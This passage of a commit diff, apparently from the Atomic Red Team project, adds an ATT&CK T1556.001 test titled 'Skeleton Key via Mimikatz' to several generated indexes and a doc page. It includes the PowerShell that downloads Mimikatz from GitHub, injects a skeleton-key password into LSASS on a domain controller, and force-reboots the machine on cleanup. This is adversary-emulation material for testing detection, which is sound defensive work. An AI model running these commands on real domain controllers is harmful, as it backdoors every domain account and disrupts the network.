New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
T1556.005:
technique:
type: attack-pattern
+6 -3
@@ -15154,7 +15154,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -15184,6 +15184,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -39310,7 +39311,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -39340,6 +39341,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -54842,7 +54844,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -54872,6 +54874,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+6 -3
@@ -13604,7 +13604,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -13634,6 +13634,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -36472,7 +36473,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -36502,6 +36503,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -50461,7 +50463,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -50491,6 +50493,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+6 -3
@@ -11651,7 +11651,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11681,6 +11681,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -32249,7 +32250,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32279,6 +32280,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -44567,7 +44569,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44597,6 +44599,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+6 -3
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -32017,7 +32018,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32047,6 +32048,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -44146,7 +44148,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44176,6 +44178,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+147 -6
@@ -22925,7 +22925,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -22955,7 +22955,54 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
atomic_tests: []
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
T1027.006:
technique:
type: attack-pattern
@@ -59848,7 +59895,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -59878,7 +59925,54 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
atomic_tests: []
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
T1556.005:
technique:
type: attack-pattern
@@ -79805,7 +79899,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -79835,7 +79929,54 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
atomic_tests: []
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
T1556.005:
technique:
type: attack-pattern
+66
@@ -0,0 +1,66 @@
# T1556.001 - Modify Authentication Process: Domain Controller Authentication
## Description from ATT&CK
> Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.
>
> Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any users account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)
[Source](https://attack.mitre.org/techniques/T1556/001)
## Atomic Tests
- [Atomic Test #1: Skeleton Key via Mimikatz](#atomic-test-1-skeleton-key-via-mimikatz)
### Atomic Test #1: Skeleton Key via Mimikatz
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
**Supported Platforms:** Windows
**auto_generated_guid:** `0ee8081f-e9a7-4a2e-a23f-68473023184f`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| mimikatz_path | Path to the mimikatz executable | path | C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe|
| file_path | File path where the zipped mimikatz file is downloaded to | path | C:\ExternalPayloads\Mimikatz\mimikatz.zip|
| mimikatz_url | The URL for the mimikatz release zip | url | https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip|
| directory_path | Directory path for mimikatz | path | C:\ExternalPayloads\Mimikatz|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
```
#### Cleanup Commands
```powershell
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz must be present on the host machine at
###### Check Prereq Commands
```powershell
if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
```
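Review bot: the rendered prerequisite heading `##### Description: Mimikatz must be present on the host machine at` ends with a dangling "at"; this heading is generated from the test's dependency description, so the fix belongs in the atomic YAML (append `#{mimikatz_path}` to that description), after which regenerating the docs corrects this page.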
+1
@@ -2,6 +2,7 @@ attack_technique: T1556.001
display_name: 'Modify Authentication Process: Domain Controller Authentication'
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+1
@@ -1800,3 +1800,4 @@ c7be89f7-5d06-4321-9f90-8676a77e0502
4608bc1b-e682-466b-a7d7-dbd76760db31
6683baf0-6e77-4f58-b114-814184ea8150
c2ca068a-eb1e-498f-9f93-3d554c455916
0ee8081f-e9a7-4a2e-a23f-68473023184f